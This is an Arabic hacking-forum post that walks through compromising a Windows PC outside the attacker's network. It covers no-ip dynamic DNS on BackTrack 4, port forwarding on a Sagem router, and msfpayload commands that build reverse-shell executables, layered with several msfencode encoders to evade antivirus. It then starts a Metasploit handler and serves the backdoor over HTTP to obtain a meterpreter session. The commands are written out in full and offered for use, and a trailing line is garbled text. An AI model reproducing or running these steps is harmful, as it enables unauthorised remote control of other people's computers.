عرض مشاركة واحدة
قديم 08-25-2010, 11:54 AM   رقم المشاركة : 1 (permalink)
معلومات العضو
punisher77
 
الصورة الرمزية punisher77
 

 

 
إحصائية العضو





punisher77 غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
punisher77 is on a distinguished road

افتراضي حصري الإختراق بال no-ip وعمل port forwarding على backtarck4 وإختراق ويندوز خارج الشبكة


مرحبا بمناسبة رمضان والغياب الطويل وكسر روتين موضوع يفتح النفس للذين فقدوا الامل في المتسبلويت شرح فتح البورت في روتر sagem fast 1201 وميزة جديدة قد لا يعرفها الكثيرين أنها أصبحت تدعم no-ip في إكسبلوات تكتب عنوانك والتجربة ستكون على bt4 attacker متصل بشبكة wifi لصديق لي وويندوز فيستا victime متصل بشبكة داخلية في المنزل وكل جهاز متصل بروتر خاص به .

نقوم في البداية بتحميل no-ip عن طريق synaptic



وأثناء تنصيب ستفتح لنا نافذة كما في الصورة التالية في تجربتي تركت المربع خالي حيث خيار عدم تفعيل nat يبدو أن هذه الخطوة مهمة لا أعرف ولكن عند نجاح الاختراق قمت بتبديل الأدوار ففي التجربة الاولى كان جهاز bt4 متصل من شبكة wifi عندما حاولت العكس أي ويندوز على wifi
في المحاولة الاولى إذا لم تنجح قم بكتابة صح على المربع الصغير الضاهر في الصورة ستسأل كيف قم بحذف البرنامج وإعادة تثبيته




بعد تنصيب no -ip جاء الدور على فتح البورت في المودم في خيار nat نضغط على port fowrarding وبعد ذلك add نكتب البورت المراد استخدامه في حالتي 4444 وبعد ذلكsave



وهذه بعض خيارات msfpayload مع وبدون تشفيرة

كود:
./msfpayload windows/shell_reverse_tcp LHOST=172.16.104.130 LPORT=31337 X > /tmp/1.exe

كود:
./msfpayload windows/shell_reverse_tcp LHOST=172.16.104.130 LPORT=31337 R | ./msfencode -e x86/shikata_ga_nai -t exe > /tmp/2.exe
كود:
./msfpayload windows/shell_reverse_tcp LHOST=172.16.104.130 LPORT=31337 R | ./msfencode -e x86/shikata_ga_nai -t raw -c 10 | ./msfencode -e
x86/call4_dword_xor -t raw -c 10 | ./msfencode -e x86/countdown -t exe > /tmp/6.exe
msfcli multi handler

كود:
./msfcli exploit/multi/handler PAYLOAD=windows/shell/reverse_tcp LHOST=172.16.104.130 LPORT=31337 E
إنشاء المتربرتر وعمل التنصت على البورت 4444 ونقل الباكدور إلى مجلد الويب سرفير ولتشغيله aplication /services / start httpd var/www



كما نرى في الصورة في team viewer نجاح تحميل الباكدور للجهاز



نقوم بتشغيله ونحصل على session meterpreter كما في الصورة ip خارجي



play slid show to see picture

مكان النجوم w e b



pwvd hgYojvhr fhg no-ip ,ulg port forwarding ugn backtarck4 ,Yojvhr ,dk],. ohv[ hgaf;m

التوقيع

http://www.vbspiders.com/vb/members/...1-user7796.jpg

 

   

رد مع اقتباس